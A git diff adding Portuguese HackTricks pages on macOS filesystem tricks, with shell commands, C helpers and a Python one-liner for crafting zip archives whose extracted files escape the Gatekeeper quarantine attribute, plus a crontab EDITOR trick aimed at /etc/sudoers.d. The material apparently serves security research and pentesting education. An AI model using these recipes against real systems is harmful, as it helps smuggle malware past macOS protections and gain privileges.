diff --git a/SUMMARY.md b/SUMMARY.md
index 0fcee7252..edec6b1ad 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -189,7 +189,8 @@
       * [macOS TCC Bypasses](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md)
         * [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md)
     * [macOS Dangerous Entitlements & TCC perms](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md)
-    * [macOS FS Tricks](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks.md)
+    * [macOS FS Tricks](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md)
+      * [macOS xattr-acls extra stuff](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md)
   * [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
 * [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md)
   * [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md)
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
new file mode 100644
index 000000000..9e8f56175
--- /dev/null
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
@@ -0,0 +1,113 @@
+# Truques do macOS FS
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
+* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
+* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+## FD Arbitrário
+
+Se você pode fazer um **processo abrir um arquivo ou uma pasta com privilégios elevados**, você pode abusar do **`crontab`** para abrir um arquivo em `/etc/sudoers.d` com **`EDITOR=exploit.py`**, assim o `exploit.py` obterá o FD para o arquivo dentro de `/etc/sudoers` e o abusará.
+
+Por exemplo: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
+
+## Truques para evitar atributos de quarentena
+
+### Flag uchg
+
+Se um arquivo/pasta tiver esse atributo imutável, não será possível colocar um xattr nele.
+```bash
+echo asd > /tmp/asd
+chflags uchg /tmp/asd
+xattr -w com.apple.quarantine "" /tmp/asd
+xattr: [Errno 1] Operation not permitted: '/tmp/asd'
+
+ls -lO /tmp/asd
+# check the "uchg" in the output
+```
+### Montagem do defvfs
+
+Uma montagem do **devfs** **não suporta xattr**, mais informações em [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)
+```bash
+mkdir /tmp/mnt
+mount_devfs -o noowners none "/tmp/mnt"
+chmod 777 /tmp/mnt
+mkdir /tmp/mnt/lol
+xattr -w com.apple.quarantine "" /tmp/mnt/lol
+xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
+```
+### ACL writeextattr
+
+Esta ACL impede a adição de `xattrs` ao arquivo.
+```bash
+rm -rf /tmp/test*
+echo test >/tmp/test
+chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
+ls -le /tmp/test
+ditto -c -k test test.zip
+# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
+
+cd /tmp
+echo y | rm test
+
+# Decompress it with ditto
+ditto -x -k --rsrc test.zip .
+ls -le /tmp/test
+
+# Decompress it with open (if sandboxed decompressed files go to the Downloads folder)
+open test.zip
+sleep 1
+ls -le /tmp/test
+```
+### **com.apple.acl.text xattr + AppleDouble**
+
+O formato de arquivo **AppleDouble** copia um arquivo incluindo suas ACEs.
+
+No [**código-fonte**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html), é possível ver que a representação de texto do ACL armazenada dentro do xattr chamado **`com.apple.acl.text`** será definida como ACL no arquivo descompactado. Portanto, se você comprimir um aplicativo em um arquivo zip com o formato de arquivo **AppleDouble** com um ACL que impede que outros xattrs sejam gravados nele... o xattr de quarentena não será definido no aplicativo:
+
+Verifique o [**relatório original**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) para obter mais informações.
+
+Para replicar isso, primeiro precisamos obter a string de acl correta:
+```bash
+# Everything will be happening here
+mkdir /tmp/temp_xattrs
+cd /tmp/temp_xattrs
+
+# Create a folder and a file with the acls and xattr
+mkdir del
+mkdir del/test_fold
+echo test > del/test_fold/test_file
+chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold
+chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file
+ditto -c -k del test.zip
+
+# uncomporess to get it back
+ditto -x -k --rsrc test.zip .
+ls -le test
+```
+(Note que mesmo que isso funcione, a sandbox escreve o atributo de quarentena antes)
+
+Não é realmente necessário, mas eu deixo aqui caso seja necessário:
+
+{% content-ref url="macos-xattr-acls-extra-stuff.md" %}
+[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md)
+{% endcontent-ref %}
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
+* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
+* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
new file mode 100644
index 000000000..1b8f7da04
--- /dev/null
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
@@ -0,0 +1,194 @@
+# Recursos adicionais de xattr-acls do macOS
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
+* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
+* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+```bash
+rm -rf /tmp/test*
+echo test >/tmp/test
+chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
+./get_acls test
+ACL for test:
+!#acl 1
+group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown
+
+ACL in hex: \x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a
+```
+<details>
+
+<summary>Código de get_acls</summary>
+```c
+// gcc -o get_acls get_acls
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/acl.h>
+
+int main(int argc, char *argv[]) {
+if (argc != 2) {
+fprintf(stderr, "Usage: %s <filepath>\n", argv[0]);
+return 1;
+}
+
+const char *filepath = argv[1];
+acl_t acl = acl_get_file(filepath, ACL_TYPE_EXTENDED);
+if (acl == NULL) {
+perror("acl_get_file");
+return 1;
+}
+
+char *acl_text = acl_to_text(acl, NULL);
+if (acl_text == NULL) {
+perror("acl_to_text");
+acl_free(acl);
+return 1;
+}
+
+printf("ACL for %s:\n%s\n", filepath, acl_text);
+
+// Convert acl_text to hexadecimal and print it
+printf("ACL in hex: ");
+for (char *c = acl_text; *c != '\0'; c++) {
+printf("\\x%02x", (unsigned char)*c);
+}
+printf("\n");
+
+acl_free(acl);
+acl_free(acl_text);
+return 0;
+}
+```
+</details>
+```bash
+# Lets add the xattr com.apple.xxx.xxxx with the acls
+mkdir start
+mkdir start/protected
+./set_xattr start/protected
+echo something > start/protected/something
+```
+<details>
+
+<summary>Código de set_xattr</summary>
+```c
+// gcc -o set_xattr set_xattr.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/xattr.h>
+#include <sys/acl.h>
+
+
+void print_xattrs(const char *filepath) {
+ssize_t buflen = listxattr(filepath, NULL, 0, XATTR_NOFOLLOW);
+if (buflen < 0) {
+perror("listxattr");
+return;
+}
+
+char *buf = malloc(buflen);
+if (buf == NULL) {
+perror("malloc");
+return;
+}
+
+buflen = listxattr(filepath, buf, buflen, XATTR_NOFOLLOW);
+if (buflen < 0) {
+perror("listxattr");
+free(buf);
+return;
+}
+
+printf("All current extended attributes for %s:\n", filepath);
+for (char *name = buf; name < buf + buflen; name += strlen(name) + 1) {
+printf("%s: ", name);
+ssize_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR_NOFOLLOW);
+if (valuelen < 0) {
+perror("getxattr");
+continue;
+}
+
+char *value = malloc(valuelen + 1);
+if (value == NULL) {
+perror("malloc");
+continue;
+}
+
+valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR_NOFOLLOW);
+if (valuelen < 0) {
+perror("getxattr");
+free(value);
+continue;
+}
+
+value[valuelen] = '\0';  // Null-terminate the value
+printf("%s\n", value);
+free(value);
+}
+
+free(buf);
+}
+
+
+int main(int argc, char *argv[]) {
+if (argc != 2) {
+fprintf(stderr, "Usage: %s <filepath>\n", argv[0]);
+return 1;
+}
+
+const char *hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a";
+const char *filepath = argv[1];
+
+int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0);
+if (result == 0) {
+printf("Extended attribute set successfully.\n\n");
+} else {
+perror("setxattr");
+return 1;
+}
+
+print_xattrs(filepath);
+
+return 0;
+}
+```
+</details>
+
+{% code overflow="wrap" %}
+```bash
+# Create appledoublefile with the xattr entitlement
+ditto -c -k start protected.zip
+rm -rf start
+# extract the files
+unzip protected.zip
+# Replace the name of the xattr here (if you put it before ditto would have destroyed it)
+python3 -c "with open('._protected', 'rb+') as f: content = f.read().replace(b'com.apple.xxx.xxxx', b'com.apple.acl.text'); f.seek(0); f.write(content); f.truncate()"
+# zip everything back together
+rm -rf protected.zip
+zip -r protected.zip protected ._protected
+rm -rf protected
+rm ._*
+```
+{% endcode %}
+```bash
+# Check if it worked
+ditto -x -k --rsrc protected.zip .
+xattr -l protected
+```
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
+* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
+* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>